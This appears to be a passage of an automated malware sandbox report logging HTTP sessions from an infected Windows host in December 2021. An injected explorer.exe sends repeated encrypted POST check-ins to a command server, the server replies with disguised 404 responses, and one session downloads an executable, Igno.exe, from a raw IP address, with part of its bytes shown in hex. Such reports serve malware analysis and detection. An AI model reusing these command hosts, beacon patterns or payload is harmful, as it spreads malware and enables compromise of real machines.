                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.649758211.59.14.9080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:31:42.182842970 CET1127OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://sbhfij.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 167
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:31:42.182873964 CET1127OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 34 aa f0
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA .[k,vu>4)Mwpj>IRcyNX[p_KiOZy('Vu%<x~a
                                                                                                                                  Dec 18, 2021 15:31:43.330394030 CET1165INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:31:42 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 8
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 04 00 00 00 70 e8 80 ef
                                                                                                                                  Data Ascii: p


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  30192.168.2.649849211.59.14.9080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:27.166806936 CET21798OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://lvxkwka.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 361
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:27.166821957 CET21798OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 29 14 ac 8f
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu)+c}[0tTU%q)"cxzJ'>>aN {(Gj,wr'JC}maX'2 Q}c{F_q_>a36`
                                                                                                                                  Dec 18, 2021 15:32:28.348505974 CET21799INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:27 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 44
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 1f ba 6a 5a b5 aa 13 a3 c4 b5 fd 74 cd 61 fc ff 2d 55 5b 89 92 8a
                                                                                                                                  Data Ascii: #\-^$jZta-U[


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  31192.168.2.64985045.9.20.2407769C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:28.422475100 CET21799OUTGET /Igno.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: 45.9.20.240:7769
                                                                                                                                  Dec 18, 2021 15:32:28.486366034 CET21801INHTTP/1.1 200 OK
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:23 GMT
                                                                                                                                  Data Raw: 36 33 32 31 64 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 3f d0 49 4a 5e be 1a 4a 5e be 1a 4a 5e be 1a d9 10 26 1a 48 5e be 1a 25 28 20 1a 5b 5e be 1a 25 28 14 1a 2c 5e be 1a 43 26 2d 1a 4f 5e be 1a 4a 5e bf 1a 81 5e be 1a 25 28 15 1a 61 5e be 1a 25 28 24 1a 4b 5e be 1a 25 28 23 1a 4b 5e be 1a 52 69 63 68 4a 5e be 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 33 12 45 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 b4 04 00 00 5e 09 00 00 00 00 00 b0 42 03 00 00 10 00 00 00 d0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 0e 00 00 04 00 00 b4 46 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 b1 04 00 3c 00 00 00 00 a0 0d 00 08 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0e 00 4c 17 00 00 60 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 82 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 da b3 04 00 00 10 00 00 00 b4 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 04 c7 08 00 00 d0 04 00 00 d8 00 00 00 b8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 6b 00 00 00 a0 0d 00 00 6c 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fa 35 00 00 00 10 0e 00 00 36 00 00 00 fc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 b4 04 00 c4 b4 04 00 d8 b4 04 00 ee b4 04 00 0a b5 04 00 1e b5 04 00 30 b5 04 00 44 b5 04 00 50 b5 04 00 60 b5 04 00 6e b5 04 00 7e b5 04 00 94 b5 04 00 a8 b5 04 00 b8 b5 04 00 d8 b5 04 00 f2 b5 04 00 0c b6 04 00 24 b6 04 00 38 b6 04 00 44 b6 04 00 52 b6 04 00 68 b6 04 00 80 b6 04 00 a2 b6 04 00 c2 b6 04 00 d8 b6 04 00 f4 b6 04 00 10 b7 04 00 22 b7 04 00 36 b7 04 00 44 b7 04 00 4c b7 04 00 58 b7 04 00 6a b7 04 00 82 b7 04 00 90 b7 04 00 b4 b7 04 00 d0 b7 04 00 e8 b7 04 00 f4 b7 04 00 06 b8 04 00 1a b8 04 00 2e b8 04 00 40 b8 04 00 5a b8 04 00 6a b8 04 00 82 b8 04 00
                                                                                                                                  Data Ascii: 6321dMZ@!L!This program cannot be run in DOS mode.$?IJ^J^J^&H^%( [^%(,^C&-O^J^^%(a^%($K^%(#K^RichJ^PEL3E_^B@PFd<kL`@@.text `.data@.rsrckl@@.reloc56@B0DP`n~$8DRh"6DLXj.@Zj


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  32192.168.2.649851222.232.238.24380C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:31.519809008 CET22217OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://lbswig.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 353
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:31.519824982 CET22217OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 13 6b 2c 90 f4 76 0b 75 38 50 f9 9a
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA ,[k,vu8PVdj#:e2u6mP,g<vQ8JX(]mM,-pAf./3cN)IaIp*EL@`'dsvX&{6/
                                                                                                                                  Dec 18, 2021 15:32:32.684422016 CET22218INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:32 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  33192.168.2.649852218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:33.086858034 CET22219OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://rmxlxoqtyn.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 314
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:33.086982012 CET22219OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 56 22 ce e2
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuV"PeNH6DR25jarWa>o:vF3@YdCI>L9Cu\kQ ;Kn@R`A8X==n
                                                                                                                                  Dec 18, 2021 15:32:34.302033901 CET22220INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:33 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  34192.168.2.649853190.117.75.9180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:34.661170959 CET22221OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pwwgj.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 119
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:34.661185980 CET22221OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 5c 55 bf a4
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu\Uy0USjVtNmCa5d
                                                                                                                                  Dec 18, 2021 15:32:35.668797016 CET22227INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:35 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  35192.168.2.649857211.59.14.9080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:35.984163046 CET22230OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://rwrqu.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 314
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:35.984183073 CET22231OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 59 40 c6 f5
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuY@m&Sx4`Cpv2jmb?TB"I{*fV=WBp=mfP-}sL&,/|~fy?cH~JF^
                                                                                                                                  Dec 18, 2021 15:32:37.251116037 CET22233INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:36 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  36192.168.2.649859148.0.74.22980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:37.882457018 CET22234OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hetky.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 267
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:37.882508993 CET22235OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 29 05 a0 94
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu)q[1GM8[Z*2{CxOA3go0xUJ!bu=`0-5TeVA4@"3iKr!<^k'N#-l
                                                                                                                                  Dec 18, 2021 15:32:38.607162952 CET22235INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:38 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
